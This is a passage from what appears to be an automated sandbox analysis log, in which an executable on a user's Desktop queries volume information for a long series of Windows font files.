          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
